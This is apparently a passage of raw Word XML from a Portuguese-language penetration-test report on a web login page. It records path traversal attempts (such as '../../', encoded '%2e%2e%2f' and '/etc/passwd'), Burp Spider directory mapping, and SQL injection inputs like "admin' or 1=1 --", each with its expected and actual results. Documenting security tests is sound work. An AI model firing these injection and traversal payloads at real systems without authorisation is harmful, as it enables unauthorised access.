      </w:r>
      <w:proofErr w:type="spell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etc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proofErr w:type="gramStart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>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C6DC7"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no sistema operacional Linux, serve para listar o conteúdo de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passwd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(local onde ficam armazenados informações de senha dos usuários). Como o sistema operacional do servidor em questão é Windows, então caso seja executado, o esperado seria um erro. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817857" w:rsidRPr="00817857" w:rsidRDefault="00817857" w:rsidP="00284BB3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17857" w:rsidRPr="00284BB3" w:rsidRDefault="00817857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BB3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17857" w:rsidRPr="00284BB3" w:rsidRDefault="00817857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84BB3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17857" w:rsidRPr="00817857" w:rsidRDefault="00817857" w:rsidP="00817857">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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17857" w:rsidRDefault="005967D5" w:rsidP="00817857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3164B7" w:rsidRPr="00F15F82" w:rsidRDefault="00D76012" w:rsidP="00817857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544368" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Não foi possível obter o acesso a qualquer outra parte do sistema.</w:t>
      </w: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essão de teste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817857" w:rsidRDefault="008C6DC7" w:rsidP="00817857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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e%2f%2e%2e%2f (código equivalente a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../../)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8C6DC7" w:rsidRDefault="00830E80" w:rsidP="0081785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O comando “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../../” serve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para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorad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17857" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="0081785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817857" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="00817857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17857" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="00817857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17857" w:rsidRDefault="005967D5" w:rsidP="00817857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817857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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00284BB3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=../data.js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para acessar o arquivo “data.js”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6C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00284BB3" w:rsidP="006304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C31FD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comando “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006C31FD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>../” serv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ara tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00284BB3" w:rsidP="0063043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“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005B5243" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="006C31FD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ata.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006C31FD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” é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um arquivo descoberto através do es</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">caneamento realizado pela funcionalidade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E158B8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E158B8" w:rsidRPr="00F15F82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="00E158B8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Spider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C8356E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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a ferramenta</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9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E12C9" w:rsidRPr="00F15F82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4E12C9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E12C9" w:rsidRPr="00F15F82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C8356E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9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para mapear a estrutura de pastas da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00284BB3" w:rsidRDefault="00284BB3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4BB3" w:rsidRPr="00284BB3" w:rsidRDefault="00284BB3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BB3"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284BB3" w:rsidRPr="00284BB3" w:rsidRDefault="00284BB3" w:rsidP="00284BB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284BB3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284BB3" w:rsidRPr="00F15F82" w:rsidRDefault="00284BB3" w:rsidP="00284BB3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4BB3" w:rsidRDefault="005967D5" w:rsidP="00284BB3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284BB3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 xml:space="preserve"> Não foi possível obter o acesso a qualquer outra parte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End"/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ado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./ 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2C0836" w:rsidRPr="00F15F82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comando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“../../../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0836" w:rsidRDefault="002C0836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C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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Default="003164B7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>Espera-se que o sistema bloqueie o acesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0836" w:rsidRPr="00F15F82" w:rsidRDefault="002C0836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Default="005967D5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6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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in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teste&amp;senha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/</w:t>
      </w:r>
      <w:r w:rsidR="005B5243"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./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2C0836" w:rsidRPr="00F15F82" w:rsidRDefault="002C0836" w:rsidP="002C0836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comando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“../../../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C31FD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6C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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6C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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lastRenderedPageBreak/>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidR="002C0836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F15F82" w:rsidRDefault="006C31FD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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema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 impeça o acesso</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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: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 xml:space="preserve">Sessão de teste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7</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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C31FD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azer uma requisição ao servidor utilizando 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2D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"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in.php?</w:t>
      </w:r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login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teste&amp;senha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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>..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,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a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs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:rsidR="002C0836" w:rsidRPr="002C0836" w:rsidRDefault="006D580D" w:rsidP="002C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 comando</w:t>
      </w:r>
      <w:r w:rsidR="002C0836" w:rsidRPr="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002C0836" w:rsidRPr="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidR="002C0836" w:rsidRPr="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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6C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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2C0836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F15F82" w:rsidRDefault="003164B7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 xml:space="preserve">Espera-se que o sistema bloqueie o acesso. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="002C08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C0836" w:rsidRDefault="005967D5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2C0836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3164B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Não foi possível obter o acesso a qualquer outra parte do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D0F86" w:rsidRPr="00F15F82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135C4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B135C4" w:rsidP="00B135C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5C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.3.1.3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Tela </w:t>
      </w:r>
      <w:proofErr w:type="spell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- Mapeamento da hierarquia de pastas do sistema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30/03/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="009D0F86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 e 30 minutos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tilizar de forma automatizada o módul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pid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a ferramen</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B135C4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B135C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B135C4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B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e a</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> partir da URL da tela de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B135C4"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B135C4" w:rsidRPr="00F15F82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proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B135C4"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="00B135C4" w:rsidRPr="00F15F82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B135C4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r w:rsidR="00B135C4" w:rsidRPr="00F15F82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="00B135C4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B135C4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B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realizar um reconhecimento da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hierarquia de diretórios do sistema armazenados dentro do servidor. </w:t>
      </w:r>
      <w:r w:rsidR="00B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mediante a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os resultados, verificar se foi possível ter acesso à hierarquia de pastas do </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sistema mesmo sem efetuar a requisição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 Além disso, verificar se é possível ter acesso aos códigos da aplicação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384949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cessar a página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utilizando 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http://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proofErr w:type="gramStart"/>
      <w:r w:rsidR="002D4365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.ph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36925" w:rsidRPr="00F15F82" w:rsidRDefault="00C36925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6925" w:rsidRPr="00F15F82" w:rsidRDefault="00384949" w:rsidP="0038494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F15F82" w:rsidRDefault="00C36925" w:rsidP="0038494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sistema não permit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a visualização da hierarquia de pastas d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84949" w:rsidRDefault="005967D5" w:rsidP="0038494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384949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. Conforme mostra figura 3, não foi possível mapear a estrutura de pastas do sistema apenas acessando a página de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654DEF" w:rsidRPr="00F15F82" w:rsidRDefault="00654DEF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64B7" w:rsidRPr="00F15F82" w:rsidRDefault="008A7473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BF9D013" wp14:editId="19B040F2">
            <wp:extent cx="180975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(Editada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3849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 xml:space="preserve">Figura 3 - Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de mapeamento diretórios do sistema</w:t>
      </w:r>
      <w:r w:rsidR="0038494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741DB" w:rsidRDefault="004741DB" w:rsidP="00384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41DB" w:rsidRDefault="004741DB" w:rsidP="00384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41DB" w:rsidRDefault="004741DB" w:rsidP="00384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384949" w:rsidP="003849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3.1.4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Tela </w:t>
      </w:r>
      <w:proofErr w:type="spell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- Exploração via SQL </w:t>
      </w:r>
      <w:proofErr w:type="spell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07/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C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 e 40 minutos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bjetiv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Submeter entradas maliciosas no sistema através de injeção de</w:t>
      </w:r>
      <w:r w:rsidR="00384949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> códigos SQL na página de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00384949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384949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Então, atra</w:t>
      </w:r>
      <w:r w:rsidR="00384949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vés de uma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930BEA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s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essão de teste</w:t>
      </w:r>
      <w:r w:rsidR="00930BEA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00384949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00930BEA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5F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>forçar ações não autorizadas no sistem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Sessão de teste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0A0" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="003F40A0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Verificar se o camp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é vulnerável a injeção de código SQL fazendo uso da técnica de concatenação de aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="003F40A0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ntrada: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F40A0" w:rsidRPr="00F15F82" w:rsidRDefault="003F40A0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6925" w:rsidRPr="00F15F82" w:rsidRDefault="003F40A0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sultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00C36925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0A0" w:rsidRDefault="005967D5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3F40A0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. A aplicação realizou o tratamento de dados de entrada e não permitiu a injeção de instruções SQL através do campo de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8C6DC7" w:rsidP="00765ACB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Inserir um texto com uma distribuição adequada de aspa simples e comentários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[8,9 e 10] como entrada no camp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, a fim de modificar a instrução SQL utilizada pelo sistema na </w:t>
      </w:r>
      <w:r w:rsidR="00765ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>consulta de dados referentes ao</w:t>
      </w:r>
      <w:r w:rsidR="00765ACB" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s usuário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cadastrados. Comentários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765ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ser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utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB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ntradas: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1 #   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB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i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1  -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB" w:rsidP="00765ACB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067BC" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB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Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007067BC" w:rsidRPr="00F15F82" w:rsidRDefault="007067BC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realize o devido</w:t>
      </w:r>
      <w:r w:rsidR="009F24CC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tratamento para impedir que as instruções de </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comentários</w:t>
      </w:r>
      <w:r w:rsidR="009F24CC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> não sejam interpretada</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009F24CC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9F24CC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">como comentários </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F24CC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>inlin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65ACB" w:rsidRDefault="005967D5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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC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741DB" w:rsidRDefault="004741DB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48383A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594AD8" w:rsidRPr="00F15F82" w:rsidRDefault="00594AD8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4741DB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Inserir um texto fazendo uso de uma única aspa simples para completar a entrada de uma possível instrução SQL executada no momento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o sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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ntradas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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admin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’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o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‘a’=’a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="004E2307" w:rsidP="002D43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</w:r>
    </w:p>
    <w:p w:rsidR="004E2307" w:rsidRPr="00F15F82" w:rsidRDefault="004E2307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</w:t>
      </w:r>
      <w:r w:rsidR="00765ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
